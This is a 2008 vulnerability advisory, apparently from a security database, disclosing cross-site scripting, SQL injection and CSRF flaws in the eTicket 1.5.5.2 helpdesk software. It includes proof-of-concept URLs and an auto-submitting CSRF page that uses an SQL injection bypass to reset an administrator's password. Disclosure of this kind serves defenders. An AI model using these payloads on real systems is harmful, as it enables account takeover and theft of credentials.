Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18810
HistoryJan 08, 2008 - 12:00 a.m.

eTicket 1.5.5.2 Multiple Vulnerabilities

2008-01-0800:00:00
vulners.com
15
JSON

======================================================================
eTicket 1.5.5.2 Multiple Vulnerabilities

Author: L4teral <l4teral [4t] gmail com>
Impact: Cross Site Scripting
Cross Site Request Forgery
SQL Injection
Status: patch not available

Affected software description:

Application: eTicket
Version: 1.5.5.2 (other versions may also be affected)
Vendor: http://eticket.sourceforge.net

Description:
eTicket is a PHP-based electronic (open source) support ticket system
based on osTicket, that can receive tickets via email (pop3/pipe) or
a web form. It also offers a ticket manager with many features.
An ideal helpdesk solution for any website.

Vulnerability:

  1. The variable 's' is not properly sanitized leading to
    cross site scripting.

  2. The script admin.php is prone to sql injections (admin
    privileges required).

  3. The search of the application is prone to sql injection, which
    can be used to obtain login credentials or perform other
    malicious taks.
    The parameters 'status', 'sort' and 'way' are not properly
    sanitized before being used in a sql query.
    Exploitation requires valid user credentials, but as any user
    is able to create a ticket, an attacker can obtain valid login
    data without any problems.

  4. The application is vulnerable to cross site request forgery.
    Combined with the "my account" part of the application
    being prone to sql injection, the password of an admin
    account can be set to an arbitrary value by just visiting
    a specially crafted website wile being logged in to the
    application. Normally, the current password has to be entered
    to change the password of an account. This can be circumvented
    in the described way by combining the two vulnerabilities.

PoC/Exploit:

http://localhost/eTicket/view.php?s=&quot;&gt;&lt;script&gt;alert&#40;document.cookie&#41;&lt;/script&gt;

http://localhost/eTicket/admin.php?a=headers&amp;msg=SQL&#39;

http://localhost/eTicket/search.php?s=advanced&amp;text=test&amp;cat=&amp;status=open&#39;SQL&amp;search_submit=Search

By visiting a page containing the following code, the password of a
logged in administrator will be set to "hacked".

<html>
<body>
<form id="csrf" name="csrf"
action="http://localhost/eTicket/admin.php?a=my&quot; method="post">
<input type="hidden" name="a" value="my">
<input type="text" name="username" value="admin"><br>
<input type="text" name="name" value="admin"><br>
<input type="text" name="email" value="[email protected]"><br>
<input type="password" name="password" value="') OR ('1'='1"><br>
<input type="password" name="npassword" value="hacked"><br>
<input type="password" name="vpassword" value="hacked"><br>
<textarea name="sig" cols="30" rows="5"></textarea><br>
<input type="submit" name="submit" value="Save Changes"><br>
</form>
<script language="JavaScript">document.getElementById('csrf').submit.click()</script>
</body>
</html>

Timeline:

2007-11-19 - vendor informed
The vendor responded, but after multiple attempts i did not get
a statement whether these vulnerabilities will get fixed
in a new version.

JSON